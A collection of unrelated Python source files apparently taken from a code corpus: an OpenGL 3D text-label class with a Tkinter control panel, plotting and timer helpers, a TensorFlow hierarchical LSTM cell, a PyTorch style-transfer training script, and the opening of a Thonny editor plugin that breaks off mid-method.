c = self.vertexSet.vertices.array
n = self.vertexSet.normals.array
lenn = len(n)
if lenn > 0 and lenn != len(c):
lMat = rotax.rotVectToVect(n[0] , (0,0,1) )
self.orientation = [
lMat[0][0],
lMat[0][1],
lMat[0][2],
lMat[0][3],
lMat[1][0],
lMat[1][1],
lMat[1][2],
lMat[1][3],
lMat[2][0],
lMat[2][1],
lMat[2][2],
lMat[2][3],
lMat[3][0],
lMat[3][1],
lMat[3][2],
lMat[3][3]
]
def Draw(self):
#print "GlfLabels.Draw", self
centers = self.vertexSet.vertices.array
if len(centers)==0:
return
labels = self.labels
if labels is None or len(labels) == 0:
return
elif len(labels) == centers.shape[0]:
txt = None
else:
txt = labels[0]
if type(txt) != types.StringType:
txt= str(txt)
self.prepareBillboardAndNormalForAllTextLines()
glf.glfSetSymbolSpace(self.fontSpacing)
if self.fontTypeIsVector:
font = self.vectorFonts[self.font]
glf.glfSetCurrentFont(font)
else:
font = self.bitmapFonts[self.font]
glf.glfSetCurrentBMFFont(font)
glf.glfStartBitmapDrawing()
resetMaterialMemory()
if self.inheritMaterial:
fp = None
bp = None
else:
self.InitMaterial()
colorFront = Numeric.array(self.materials[GL.GL_FRONT].prop[1], copy=1)
fp = self.materials[GL.GL_FRONT]
if fp.binding[1] == viewerConst.OVERALL:
GL.glColor4fv(colorFront[0])
bp = None
face = GL.GL_FRONT_AND_BACK
else:
bp = self.materials[GL.GL_BACK]
face = GL.GL_FRONT
## if fp:
## for m in (0,1,2,3,4):
## if fp.binding[m] == viewerConst.OVERALL:
## glMaterialWithCheck( face,
## viewerConst.propConst[m],
## fp.prop[m][0])
## if fp.binding[1] == viewerConst.OVERALL:
## GL.glColor4fv(colorFront[0])
for i in xrange(centers.shape[0]):
if fp:
for m in (0,1,2,3,4):
if fp.binding[m] == viewerConst.PER_VERTEX:
b, p = fp.GetProperty(m)
glMaterialWithCheck( face,
viewerConst.propConst[m],
p[i] )
if fp.binding[1] != viewerConst.OVERALL:
GL.glColor4fv(colorFront[i])
if bp:
for m in (0,1,2,3,4):
if bp.binding[m] == viewerConst.PER_VERTEX:
b, p = bp.GetProperty(m)
glMaterialWithCheck( face,
viewerConst.propConst[m],
p[i] )
#GL.glPushName(i)
if txt is None:
txt2 = self.labels[i]
if type(txt2) != types.StringType:
txt2 = str(txt2)
self.drawOne3dTextLine(txt2, i)
else:
self.drawOne3dTextLine(txt, i)
#GL.glPopName()
if self.fontTypeIsVector is False:
glf.glfStopBitmapDrawing()
return 1
def asIndexedPolygons(self, run=1, removeDupVerts=0, **kw):
"""Should return an IndexedPolygons object if this object can be
represented using triangles, else return None. run=0 returns 1
if this geom can be represented as an IndexedPolygon and None if not
run=1 returns the IndexedPolygon object.
"""
#print "GlfLabels::asIndexedPolygons"
#import pdb;pdb.set_trace()
if run == 0:
return 1 # yes, I can be represented as IndexedPolygons
self.prepareBillboardAndNormalForAllTextLines()
lLenLabelsVertices = len(self.vertexSet.vertices.array)
if lLenLabelsVertices != len(self.labels):
lSameText = True
assert len(self.labels) > 0
if type(self.labels[0]) == types.StringType:
output = glf.glfGet3DSolidStringTriangles(self.labels[0])
else:
output = glf.glfGet3DSolidStringTriangles( str(self.labels[0]) )
lNumOfTriangleVertices = len(output[0])
assert lNumOfTriangleVertices == len(output[1])
#assert is a multiple of 3
else:
lSameText = False
if lLenLabelsVertices != len(self.vertexSet.normals.array):
if len(self.vertexSet.normals.array) > 0:
lSameOrientation = True
lLocalNormal = self.normals[0]
else:
lLocalNormal = None
self.prepareBillboardAndNormalForAllTextLines()
lOverallTriangles = []
lOverallVertices = []
lOverallTrianglesColors = []
for i in range(lLenLabelsVertices):
#print "i", i
if lSameText is False:
if type(self.labels[0]) == types.StringType:
output = glf.glfGet3DSolidStringTriangles(self.labels[i])
else:
output = glf.glfGet3DSolidStringTriangles( str(self.labels[i]) )
lNumOfTriangleVertices = len(output[0])
assert lNumOfTriangleVertices == len(output[1])
#assert is a multiple of 3
colorFront = Numeric.array(self.materials[GL.GL_FRONT].prop[1], copy=1)
lNumOfOverallVertices = len(lOverallVertices)
for j in range(
lNumOfOverallVertices,
lNumOfOverallVertices+lNumOfTriangleVertices,
3):
lOverallTriangles.append( ( j, j+1, j+2 ) )
lOverallTrianglesColors.append(colorFront[i])
lMatrix = self.drawOne3dTextLine(None, i)
lMatrix.shape = (4, 4)
for j in range(lNumOfTriangleVertices):
lVertexBeforeTransform = output[0][j]
lVertex = []
lVertex.append( lMatrix[0][0] * lVertexBeforeTransform[0] \
+ lMatrix[1][0] * lVertexBeforeTransform[1] \
+ lMatrix[2][0] * lVertexBeforeTransform[2] \
+ lMatrix[3][0] )
lVertex.append( lMatrix[0][1] * lVertexBeforeTransform[0] \
+ lMatrix[1][1] * lVertexBeforeTransform[1] \
+ lMatrix[2][1] * lVertexBeforeTransform[2] \
+ lMatrix[3][1] )
lVertex.append( lMatrix[0][2] * lVertexBeforeTransform[0] \
+ lMatrix[1][2] * lVertexBeforeTransform[1] \
+ lMatrix[2][2] * lVertexBeforeTransform[2] \
+ lMatrix[3][2] )
lOverallVertices.append(lVertex)
lIndexedPolygons = IndexedPolygons(
self.name+'_glfTriangles',
vertices=lOverallVertices,
faces=lOverallTriangles,
materials=lOverallTrianglesColors,
visible=1,
invertNormals=self.invertNormals,
)
return lIndexedPolygons
def createOwnGui(self):
#print "GlfLabels.createOwnGui", self
self.ownGui = Tkinter.Toplevel()
self.ownGui.title(self.name)
self.ownGui.protocol('WM_DELETE_WINDOW', self.ownGui.withdraw )
frame1 = Tkinter.Frame(self.ownGui)
frame1.pack(side='top')
# labels
self.ownGui.labelsEnt = Pmw.EntryField(
frame1,
label_text='list of labels',
labelpos='w',
value=str(self.labels),
command=self.setWithOwnGui)
self.ownGui.labelsEnt.pack(side='top', fill='x')
# billboard
self.ownGui.billboardVar = Tkinter.IntVar()
self.ownGui.billboardVar.set(self.billboard)
self.ownGui.guiBillboard = Tkinter.Checkbutton(
frame1,
text='billboard',
variable=self.ownGui.billboardVar,
command=self.setWithOwnGui)
self.ownGui.guiBillboard.pack(side='top', fill='x')
# includeCameraRotationInBillboard
self.ownGui.includeCameraRotationInBillboardVar = Tkinter.IntVar()
self.ownGui.includeCameraRotationInBillboardVar.set(self.includeCameraRotationInBillboard)
self.ownGui.guiIncludeCameraRotationInBillboard = Tkinter.Checkbutton(
frame1,
text='includeCameraRotationInBillboard',
variable=self.ownGui.includeCameraRotationInBillboardVar,
command=self.setWithOwnGui)
self.ownGui.guiIncludeCameraRotationInBillboard.pack(side='top', fill='x')
# # lighting
# self.ownGui.lightingVar = Tkinter.IntVar()
# self.ownGui.lightingVar.set(self.lighting)
# self.ownGui.guiLighting = Tkinter.Checkbutton(
# frame1,
# text='lighting',
# variable=self.ownGui.lightingVar,
# command=self.setWithOwnGui)
# self.ownGui.guiLighting.pack(side='top', fill='x')
# font
self.ownGui.guiFontComboBox = Pmw.ComboBox(
frame1,
label_text='font',
labelpos='w',
entryfield_value=self.font,
scrolledlist_items=self.fontList,
selectioncommand=self.setWithOwnGui
)
self.ownGui.guiFontComboBox.pack(side='top', fill='x')
# font style
self.ownGui.guiFontStyleComboBox = Pmw.ComboBox(
frame1,
label_text='font style',
labelpos='w',
entryfield_value=self.fontStyle,
scrolledlist_items=self.fontStyleList,
selectioncommand=self.setWithOwnGui
)
self.ownGui.guiFontStyleComboBox.pack(side='top', fill='x')
# font spacing
self.ownGui.guiSpacing = ThumbWheel(
frame1,
labCfg={'text':'font spacing', 'side':'left'},
showLabel=1,
width=80,
height=16,
min=0,
#max=100,
type=float,
value=self.fontSpacing,
callback=self.setWithOwnGui,
continuous=True,
oneTurn=1,
wheelPad=2
)
self.ownGui.guiSpacing.pack(side='top', fill='x')
# font global scale
self.ownGui.guiGlobalScale = ThumbWheel(
frame1,
labCfg={'text':'global scale', 'side':'left'},
showLabel=1,
width=80,
height=16,
min=0,
#max=100,
type=float,
value=1.,
callback=self.setWithOwnGui,
continuous=True,
oneTurn=1,
wheelPad=2
)
self.ownGui.guiGlobalScale.pack(side='top', fill='x')
# font scale X
self.ownGui.guiScaleX = ThumbWheel(
frame1,
labCfg={'text':'scale X', 'side':'left'},
showLabel=1,
width=80,
height=16,
min=0,
#max=100,
type=float,
value=self.fontScales[0],
callback=self.setWithOwnGui,
continuous=True,
oneTurn=1,
wheelPad=2
)
self.ownGui.guiScaleX.pack(side='top', fill='x')
# font scale Y
self.ownGui.guiScaleY = ThumbWheel(
frame1,
labCfg={'text':'scale Y', 'side':'left'},
showLabel=1,
width=80,
height=16,
min=0,
#max=100,
type=float,
value=self.fontScales[1],
callback=self.setWithOwnGui,
continuous=True,
oneTurn=1,
wheelPad=2
)
self.ownGui.guiScaleY.pack(side='top', fill='x')
# font scale Z
self.ownGui.guiScaleZ = ThumbWheel(
frame1,
labCfg={'text':'scale Z', 'side':'left'},
showLabel=1,
width=80,
height=16,
min=0,
#max=100,
type=float,
value=self.fontScales[2],
callback=self.setWithOwnGui,
continuous=True,
oneTurn=1,
wheelPad=2
)
self.ownGui.guiScaleZ.pack(side='top', fill='x')
# font Translate X
self.ownGui.guiTranslateX = ThumbWheel(
frame1,
labCfg={'text':'translate X', 'side':'left'},
showLabel=1,
width=80,
height=16,
#min=0,
#max=100,
type=float,
value=self.fontTranslation[0],
callback=self.setWithOwnGui,
continuous=True,
oneTurn=1,
wheelPad=2
)
self.ownGui.guiTranslateX.pack(side='top', fill='x')
# font Translate Y
self.ownGui.guiTranslateY = ThumbWheel(
frame1,
labCfg={'text':'translate Y', 'side':'left'},
showLabel=1,
width=80,
height=16,
#min=0,
#max=100,
type=float,
value=self.fontTranslation[1],
callback=self.setWithOwnGui,
continuous=True,
oneTurn=1,
wheelPad=2
)
self.ownGui.guiTranslateY.pack(side='top', fill='x')
# font Translate Z
self.ownGui.guiTranslateZ = ThumbWheel(
frame1,
labCfg={'text':'translate Z', 'side':'left'},
showLabel=1,
width=80,
height=16,
#min=0,
#max=100,
type=float,
value=self.fontTranslation[2],
callback=self.setWithOwnGui,
continuous=True,
oneTurn=1,
wheelPad=2
)
self.ownGui.guiTranslateZ.pack(side='top', fill='x')
# font Rotate X
self.ownGui.guiRotateX = ThumbWheel(
frame1,
labCfg={'text':'Rotate X', 'side':'left'},
showLabel=1,
width=80,
height=16,
min=-180,
max=180,
type=float,
value=self.fontRotateAngles[0],
callback=self.setWithOwnGui,
continuous=True,
oneTurn=90,
wheelPad=2
)
self.ownGui.guiRotateX.pack(side='top', fill='x')
# font Rotate Y
self.ownGui.guiRotateY = ThumbWheel(
frame1,
labCfg={'text':'Rotate Y', 'side':'left'},
showLabel=1,
width=80,
height=16,
min=-180,
max=180,
type=float,
value=self.fontRotateAngles[1],
callback=self.setWithOwnGui,
continuous=True,
oneTurn=90,
wheelPad=2
)
self.ownGui.guiRotateY.pack(side='top', fill='x')
# font Rotate Z
self.ownGui.guiRotateZ = ThumbWheel(
frame1,
labCfg={'text':'Rotate Z', 'side':'left'},
showLabel=1,
width=80,
height=16,
min=-180,
max=180,
type=float,
value=self.fontRotateAngles[2],
callback=self.setWithOwnGui,
continuous=True,
oneTurn=90,
wheelPad=2
)
self.ownGui.guiRotateZ.pack(side='top', fill='x')
def setWithOwnGui(self, event=None):
"""
"""
#print "setWithOwnGui", event
lGlobalScale = self.ownGui.guiGlobalScale.get()
self.Set(labels=eval(self.ownGui.labelsEnt.get()),
billboard=self.ownGui.billboardVar.get(),
includeCameraRotationInBillboard=self.ownGui.includeCameraRotationInBillboardVar.get(),
#lighting=self.ownGui.lightingVar.get(),
font=self.ownGui.guiFontComboBox.get(),
fontStyle=self.ownGui.guiFontStyleComboBox.get(),
fontSpacing=self.ownGui.guiSpacing.get(),
fontScales = ( lGlobalScale*self.ownGui.guiScaleX.get(),
lGlobalScale*self.ownGui.guiScaleY.get(),
lGlobalScale*self.ownGui.guiScaleZ.get() ),
fontTranslation = ( self.ownGui.guiTranslateX.get(),
self.ownGui.guiTranslateY.get(),
self.ownGui.guiTranslateZ.get() ),
fontRotateAngles = ( self.ownGui.guiRotateX.get(),
self.ownGui.guiRotateY.get(),
self.ownGui.guiRotateZ.get() ),
updateOwnGui=False)
def updateOwnGui(self):
self.ownGui.title(self.name)
self.ownGui.labelsEnt.setvalue(str(self.labels))
self.ownGui.billboardVar.set(self.billboard)
self.ownGui.includeCameraRotationInBillboardVar.set(self.includeCameraRotationInBillboard)
#self.ownGui.lightingVar.set(self.lighting)
self.ownGui.guiFontComboBox.selectitem(self.font)
self.ownGui.guiFontStyleComboBox.selectitem(self.fontStyle)
self.ownGui.guiSpacing.set(self.fontSpacing, update=0)
self.ownGui.guiGlobalScale.set(1., update=0)
self.ownGui.guiScaleX.set(self.fontScales[0], update=0)
self.ownGui.guiScaleY.set(self.fontScales[1], update=0)
self.ownGui.guiScaleZ.set(self.fontScales[2], update=0)
self.ownGui.guiTranslateX.set(self.fontTranslation[0], update=0)
self.ownGui.guiTranslateY.set(self.fontTranslation[1], update=0)
self.ownGui.guiTranslateZ.set(self.fontTranslation[2], update=0)
self.ownGui.guiRotateX.set(self.fontRotateAngles[0], update=0)
self.ownGui.guiRotateY.set(self.fontRotateAngles[1], update=0)
self.ownGui.guiRotateZ.set(self.fontRotateAngles[2], update=0)
|
<filename>src/GradientFreeOptimizers/Helpers.py
'''
Name: Helpers
Desriptption: Some helper functions
Email: <EMAIL>
OpenSource: https://github.com/yesunhuang
Msg: for studying quantum RNN
Author: YesunHuang
Date: 2022-04-02 23:10:18
'''
#import everything
from IPython import display
import time
import matplotlib.pyplot as plt
import numpy as np
class Animator:
"""drawing data with animation"""
def __init__(self, xlabel=None, ylabel=None, legend=None, xlim=None,
ylim=None, xscale='linear', yscale='linear',
fmts=('-', 'm--', 'g-.', 'r:'), nrows=1, ncols=1,
figsize=(3.5, 2.5)):
'''
name: __init__
fuction: initialize the animator
param {xlabel}: the label of x
param {ylabel}: the label of y
param {legend}: the legend
param {xlim}: the limit of x
param {ylim}: the limit of y
param {xscale}: the scale of x
param {yscale}: the scale of y
param {fmts}: the format of lines
param {nrows}: the number of rows
param {ncols}: the number of columns
param {figsize}: the size of figure
'''
# draw grids
if legend is None:
legend = []
self.fig, self.axes = plt.subplots(nrows, ncols, figsize=figsize)
if nrows * ncols == 1:
self.axes = [self.axes, ]
# define paramters catcher
self.config_axes = lambda: self.set_axes(
self.axes[0], xlabel, ylabel, xlim, ylim, xscale, yscale, legend)
self.X, self.Y, self.fmts = None, None, fmts
def set_axes(self,axes, xlabel, ylabel, xlim, ylim, xscale, yscale, legend):
'''
name: set_axes
fuction: set the axes
param {axes}: the axes
param {xlabel}: the label of x
param {ylabel}: the label of y
param {xlim}: the limit of x
param {ylim}: the limit of y
param {xscale}: the scale of x
param {yscale}: the scale of y
param {legend}: the legend
'''
# set label
if xlabel is not None:
axes.set_xlabel(xlabel)
if ylabel is not None:
axes.set_ylabel(ylabel)
# set scale
axes.set_xscale(xscale)
axes.set_yscale(yscale)
# set limit
if xlim is not None:
axes.set_xlim(*xlim)
if ylim is not None:
axes.set_ylim(*ylim)
# set legend
if legend is not None:
axes.legend(legend)
axes.grid()
def add(self, x, y):
'''
name: add
fuction: add data
param {x}: the x data
param {y}: the y data
'''
if not hasattr(y, "__len__"):
y = [y]
n = len(y)
if not hasattr(x, "__len__"):
x = [x] * n
if not self.X:
self.X = [[] for _ in range(n)]
if not self.Y:
self.Y = [[] for _ in range(n)]
for i, (a, b) in enumerate(zip(x, y)):
if a is not None and b is not None:
self.X[i].append(a)
self.Y[i].append(b)
self.axes[0].cla()
for x, y, fmt in zip(self.X, self.Y, self.fmts):
self.axes[0].plot(x, y, fmt)
self.config_axes()
display.display(self.fig)
display.clear_output(wait=True)
class Timer:
"""Record multiple running times."""
def __init__(self):
'''
name: __init__
fuction: initialize the timer
'''
self.times = []
self.start()
def start(self):
'''
name: start
fuction: start the timer
'''
self.tik = time.time()
def stop(self):
'''
name: stop
fuction: stop the timer and record the time in a list
'''
self.times.append(time.time() - self.tik)
return self.times[-1]
def avg(self):
'''
name: avg
fuction: return the average time
'''
return sum(self.times) / len(self.times)
def sum(self):
'''
name: sum
fuction: return the sum of time
'''
return sum(self.times)
def cumsum(self):
'''
name: cumsum
fuction: Return the accumulated time
'''
return np.array(self.times).cumsum().tolist()
class Accumulator:
"""accumulate on n variables"""
def __init__(self, n):
'''
name: __init__
fuction: initialize the accumulator
'''
self.data = [0.0] * n
def add(self, *args):
'''
name: add
fuction: add the data
param {*args}: data to be added
'''
self.data = [a + float(b) for a, b in zip(self.data, args)]
def reset(self):
'''
name: reset
fuction: reset the data
'''
self.data = [0.0] * len(self.data)
def __getitem__(self, idx):
'''
name: __getitem__
fuction: get the data
param {idx}: the index of data
'''
return self.data[idx]
def list_split(source:list,size:int):
'''
name: list_split
fuction: split the list into several parts
param {source}: the source list
param {size}: the size of each part, if the last part is smaller than size,
the last part will be the last part.
'''
splittedList=[]
for i in range(0, len(source), size):
if (i+size)<len(source):
splittedList.append(source[i:i + size])
else:
splittedList.append(source[i:])
return splittedList
def list_concat(source:list):
'''
name: list_cat
fuction: concatenate the list
param {source}: the source list
'''
catList=[]
for item in source:
catList=catList+item
return catList |
# -*- coding: utf-8 -*-
import tensorflow as tf
class HEBR_Cell():
def __init__(self):
self.dims = {'user': None,
'area': None,
'climate': None,
'user_hidden': None,
'area_hidden': None,
'climate_hidden': None,
'user_area': None,
'user_climate': None,
'user_area_hidden': None,
'user_climate_hidden': None,
'user_area_climate': None,
'user_area_climate_hidden': None}
self.is_training = True
def set_configuration(self, his_len, dims, is_training):
self.his_len = his_len
self.dims = dims
self.is_training = is_training
def __weights__(self, input_dim, output_dim, name, init=True, std=0.1, reg=None):
if init:
return tf.get_variable(name, shape=[input_dim, output_dim], initializer=tf.random_normal_initializer(0.0, std), regularizer=reg)
else:
return tf.get_variable(name, shape=[input_dim, output_dim])
def __bias__(self, output_dim, name, init=True):
if init:
return tf.get_variable(name, shape=[output_dim], initializer=tf.constant_initializer(1.0))
else:
return tf.get_variable(name, shape=[output_dim])
def FeatureFusion(self, emb1, emb2, prev_emb2, dims, name, reuse=False):
"""
Multi-step hierarchical fusion mechanism
"""
dim_1 = dims[0]
dim_2 = dims[1]
with tf.variable_scope(name, reuse=reuse):
self.W_cur = self.__weights__(dim_2, dim_1, name='Cur_weight', init=self.is_training)
self.W_prev = self.__weights__(dim_2, dim_1, name='Prev_weight', init=self.is_training)
self.Wa = self.__weights__(2*dim_1, 1, name='Attention_weight', init=self.is_training)
f_cur = (emb1 + tf.matmul(emb2, self.W_cur)) / 2
f_prev = (emb1 + tf.matmul(prev_emb2, self.W_prev)) / 2
fused_emb = tf.concat([f_cur, f_prev], axis=-1)
a_score = tf.matmul(fused_emb, self.Wa)
out_logits = a_score * tf.nn.tanh(fused_emb)
return out_logits, fused_emb, a_score
def __LSTMUnit__(self, input_x, prev, prev_memory, dims, name, reuse=False):
"""
LSTM unit
"""
input_dim = dims[0]
output_dim = dims[1]
with tf.variable_scope(name, reuse=reuse):
self.Wi = self.__weights__(input_dim, output_dim, name='Input_weight_1', init=self.is_training)
self.Ui = self.__weights__(output_dim, output_dim, name='Input_weight_2', init=self.is_training)
self.bi = self.__bias__(output_dim, name='Input_bias', init=self.is_training)
self.Wf = self.__weights__(input_dim, output_dim, name='Forget_weight_1', init=self.is_training)
self.Uf = self.__weights__(output_dim, output_dim, name='Forget_weight_2', init=self.is_training)
self.bf = self.__bias__(output_dim, name='Forget_bias', init=self.is_training)
self.Wo = self.__weights__(input_dim, output_dim, name='Output_weight_1', init=self.is_training)
self.Uo = self.__weights__(output_dim, output_dim, name='Output_weight_2', init=self.is_training)
self.bo = self.__bias__(output_dim, name='Output_bias', init=self.is_training)
self.Wc = self.__weights__(input_dim, output_dim, name='Global_weight_1', init=self.is_training)
self.Uc = self.__weights__(output_dim, output_dim, name='Global_weight_2', init=self.is_training)
self.bc = self.__bias__(output_dim, name='Global_bias', init=self.is_training)
# input gate
I = tf.nn.sigmoid(tf.matmul(input_x, self.Wi) + tf.matmul(prev, self.Ui) + self.bf)
# forget gate
F = tf.nn.sigmoid(tf.matmul(input_x, self.Wf) + tf.matmul(prev, self.Uf) + self.bf)
# output gate
O = tf.nn.sigmoid(tf.matmul(input_x, self.Wo) + tf.matmul(prev, self.Uo) + self.bo)
# long term memory cell
C_ = tf.nn.tanh(tf.matmul(input_x, self.Wc) + tf.matmul(F * prev, self.Uc) + self.bc)
# output
Ct = F * prev_memory + I * C_
# current information
current_memory = Ct
current = O * tf.nn.tanh(Ct)
return current, current_memory
def Cell(self, input_u, input_a, input_c, hiddens, reuse=False):
prev_emb_u = hiddens['uh']
prev_mem_u = hiddens['um']
prev_emb_a = hiddens['ah']
prev_mem_a = hiddens['am']
prev_emb_c = hiddens['ch']
prev_mem_c = hiddens['cm']
prev_emb_ua = hiddens['uah']
prev_mem_ua = hiddens['uam']
prev_emb_uc = hiddens['uch']
prev_mem_uc = hiddens['ucm']
prev_emb_uac = hiddens['uach']
prev_mem_uac = hiddens['uacm']
with tf.variable_scope('HEBR_Cell'):
cur_emb_u, cur_mem_u = self.__LSTMUnit__(input_u, prev_emb_u, prev_mem_u, dims=[self.dims['user'], self.dims['user_hidden']], name='User', reuse=reuse)
cur_emb_a, cur_mem_a = self.__LSTMUnit__(input_a, prev_emb_a, prev_mem_a, dims=[self.dims['area'], self.dims['area_hidden']], name='Area', reuse=reuse)
cur_emb_c, cur_mem_c = self.__LSTMUnit__(input_c, prev_emb_c, prev_mem_c, dims=[self.dims['climate'], self.dims['climate_hidden']], name='Climate', reuse=reuse)
input_ua, fuse_ua, score_ua = self.FeatureFusion(cur_emb_u, cur_emb_a, prev_emb_a, dims=[self.dims['user_hidden'], self.dims['area_hidden']], name='User_Area_Fusion', reuse=reuse)
input_uc, fuse_uc, score_uc = self.FeatureFusion(cur_emb_u, cur_emb_c, prev_emb_c, dims=[self.dims['user_hidden'], self.dims['climate_hidden']], name='User_Climate_Fusion', reuse=reuse)
cur_emb_ua, cur_mem_ua = self.__LSTMUnit__(input_ua, prev_emb_ua, prev_mem_ua, dims=[self.dims['user_area'], self.dims['user_area_hidden']], name='User_Area', reuse=reuse)
cur_emb_uc, cur_mem_uc = self.__LSTMUnit__(input_uc, prev_emb_uc, prev_mem_uc, dims=[self.dims['user_climate'], self.dims['user_climate_hidden']], name='User_Climate', reuse=reuse)
input_uac, fuse_uac, score_uac = self.FeatureFusion(cur_emb_ua, cur_emb_uc, prev_emb_uc, dims=[self.dims['user_area_hidden'], self.dims['user_climate_hidden']], name='User_Area_Climate_Fusion', reuse=reuse)
cur_emb_uac, cur_mem_uac = self.__LSTMUnit__(input_uac, prev_emb_uac, prev_mem_uac, dims=[self.dims['user_area_climate'], self.dims['user_area_climate_hidden']], name='User_Area_Climate', reuse=reuse)
return {'uh': cur_emb_u,
'um': cur_mem_u,
'ah': cur_emb_a,
'am': cur_mem_a,
'ch': cur_emb_c,
'cm': cur_mem_c,
'uah': cur_emb_ua,
'uam': cur_mem_ua,
'uch': cur_emb_uc,
'ucm': cur_mem_uc,
'uach': cur_emb_uac,
'uacm': cur_mem_uac,
'uas': score_ua,
'ucs': score_uc,
'uacs': score_uac}
def get_embedding(self, user_seq, area_seq, climate_seq):
self.batch_size = tf.shape(user_seq)[0]
# time major
user_seq = tf.transpose(user_seq, [1, 0, 2]) # [seq_length * batch_size * n_features]
area_seq = tf.transpose(area_seq, [1, 0, 2])
climate_seq = tf.transpose(climate_seq, [1, 0, 2])
# inital
hiddens = {'uh': tf.zeros([self.batch_size, self.dims['user_hidden']], dtype=tf.float32),
'um': tf.zeros([self.batch_size, self.dims['user_hidden']], dtype=tf.float32),
'ah': tf.zeros([self.batch_size, self.dims['area_hidden']], dtype=tf.float32),
'am': tf.zeros([self.batch_size, self.dims['area_hidden']], dtype=tf.float32),
'ch': tf.zeros([self.batch_size, self.dims['climate_hidden']], dtype=tf.float32),
'cm': tf.zeros([self.batch_size, self.dims['climate_hidden']], dtype=tf.float32),
'uah': tf.zeros([self.batch_size, self.dims['user_area_hidden']], dtype=tf.float32),
'uam': tf.zeros([self.batch_size, self.dims['user_area_hidden']], dtype=tf.float32),
'uch': tf.zeros([self.batch_size, self.dims['user_climate_hidden']], dtype=tf.float32),
'ucm': tf.zeros([self.batch_size, self.dims['user_climate_hidden']], dtype=tf.float32),
'uach': tf.zeros([self.batch_size, self.dims['user_area_climate_hidden']], dtype=tf.float32),
'uacm': tf.zeros([self.batch_size, self.dims['user_area_climate_hidden']], dtype=tf.float32),
'uas': None,
'ucs': None,
'uacs': None}
emb_logits, attention_logits = [], []
for i in range(self.his_len):
if i == 0:
hiddens = self.Cell(user_seq[i], area_seq[i], climate_seq[i], hiddens, reuse=False)
else:
hiddens = self.Cell(user_seq[i], area_seq[i], climate_seq[i], hiddens, reuse=True)
emb_logits.append(hiddens['uach'])
attention_logits.append([hiddens['uas'], hiddens['ucs'], hiddens['uacs']])
return emb_logits, attention_logits |
<gh_stars>1-10
from net.tran import FeatureNet, TransformerNet
from net.tran import gram_matrix,batch_normalize
import torch as t
import torchvision as tv
from torch.nn import functional as F
from torch.utils.data import DataLoader
import tqdm
import matplotlib.pyplot as plt
import cv2
import numpy as np
device=t.device('cuda:0') if t.cuda.is_available() else t.device('cpu')
BATCH = 1
class TransModel():
def __init__(self):
self.transformer = TransformerNet().to(device)
self.discriminator = TransformerNet().to(device)
self.extracter = FeatureNet().eval().to(device)
self.trans_lr = 2e-4
self.dis_lr = 1e-3
self.content_weight = 1
self.style_weight = 1
self.dis_weight = 1
self.optimizer_trans = t.optim.Adam(self.transformer.parameters(), self.trans_lr)
self.optimizer_dis = t.optim.Adam(self.discriminator.parameters(), self.dis_lr)
self.epoches = 500
def train(self,dataloader,style):
for epoch in range(self.epoches):
for i, (x, _) in enumerate(dataloader):
#预处理x
x = x.to(device)
_,C,_,_ = x.shape
if C == 3:
x = x.mean(axis=1)
x = t.stack((x,x,x),axis=1)
elif C == 1:
x = x.squeeze(axis=1)
x = t.stack((x,x,x),axis=1)
#训练判别器
y = self.transformer(x)
real_loss = 1 - self.discriminator(style).mean()
fake_loss = self.discriminator(y).mean()
dis_loss = self.dis_weight * (real_loss+fake_loss)
self.optimizer_dis.zero_grad()
dis_loss.backward()
self.optimizer_dis.step()
#训练生成器
y = self.transformer(x)
#生成器的内容损失
features_y = self.extracter(y)
features_x = self.extracter(x)
content_loss = self.content_weight * F.mse_loss(features_y.relu2, features_x.relu2)
#生成器的风格损失,生成器的任务是欺骗判别器
style_loss = 1 - self.discriminator(y).mean()
style_loss = self.style_weight * style_loss
trans_loss = content_loss + style_loss
self.optimizer_trans.zero_grad()
trans_loss.backward()
self.optimizer_trans.step()
print('epoch',epoch,'dis_loss',dis_loss.item(),'content_loss',content_loss.item(),'style_loss',style_loss.item())
if epoch % 10 == 0:
plt.figure()
origin_img = x.data.cpu()[0].permute(1,2,0)
style_img = style.cpu()[0].permute(1,2,0)
new_img = y.data.cpu()[0].permute(1,2,0)
plt.subplot(111)
plt.imshow(new_img)
plt.xticks([]),plt.yticks([])
#中间结果存放于dump下
plt.savefig('./dump/' + str(epoch/10) +'.png')
plt.close()
def stylise(self,style,content,save_path):
plt.figure()
origin_img = content.cpu()[0].permute(1,2,0)
style_img = style.cpu()[0].permute(1,2,0)
y = self.transformer(content)
new_img = y.data.cpu()[0].permute(1,2,0)
plt.subplot(111)
plt.imshow(new_img)
plt.xticks([]),plt.yticks([])
plt.savefig(save_path)
plt.close()
img_size = 512
img_mean = [0.485, 0.456, 0.406]
img_std = [0.229, 0.224, 0.225]
myTransform = tv.transforms.Compose([
tv.transforms.ToTensor(),
tv.transforms.Resize(img_size),
tv.transforms.CenterCrop(img_size),
#tv.transforms.Normalize(mean=img_mean, std=img_std),
])
styleTransform = tv.transforms.Compose([
tv.transforms.ToTensor(),
tv.transforms.RandomCrop(img_size),
tv.transforms.CenterCrop(img_size),
#tv.transforms.Normalize(mean=img_mean, std=img_std),
])
#使用end2end的训练
dataset = tv.datasets.ImageFolder("/workspace/art/test_images", myTransform)
dataloader = DataLoader(dataset, BATCH)
style_path = 'images/Raphael_Project_image/6. 197x168.tiff'
style_image = tv.datasets.folder.default_loader(style_path)
style = styleTransform(style_image).unsqueeze(0).to(device)
trans = TransModel()
trans.train(dataloader,style)
for i in range(1,10):
content_path ='test_images/img/' + str(i) +'.jpg'
content_image = tv.datasets.folder.default_loader(content_path)
content = myTransform(content_image).unsqueeze(0).to(device)
trans.stylise(style,content,'results/' + str(i) + '.png') |
<reponame>beardad1975/thonny-pos
import tkinter as tk
from tkinter import ttk
from thonny.codeview import CodeViewText
from thonny.shell import ShellText
from thonny import get_workbench, get_shell
from ..base_postit import BaseCode, BasePost, BasePopup
from ..common import common_images
class ToolWidget(ttk.Frame):
def widget_init(self, master, tool_name):
# don't need to handle tab
self.tool_name = tool_name
self.tool_image = common_images[tool_name]
ttk.Frame.__init__(self, master)
self.postit_button = tk.Button(self,
relief='groove',
borderwidth=0,
#fg=self.tab.font_color,
#bg=self.tab.fill_color,
#justify='left',
#font=f,
compound='right',
image=self.tool_image,
padx=0,
pady=0,
)
self.postit_button.pack(side=tk.LEFT, anchor='w')
#self.note_label = ttk.Label(self, text='' )
#self.note_label.pack(side=tk.LEFT, anchor='w',padx=5)
class ToolCodeMixin:
def code_init(self):
# tk var
self.var_postfix_enter = tk.BooleanVar()
self.var_postfix_enter.set(False)
self.code_display = ''
self.note = ''
self.code = ''
#self.update_postit_code()
def update_postit_code(self):
pass
class ToolPostMixin:
def insert_into_editor(self, text_widget, selecting, dragging):
if self.tool_name == 'backspace':
if not dragging:
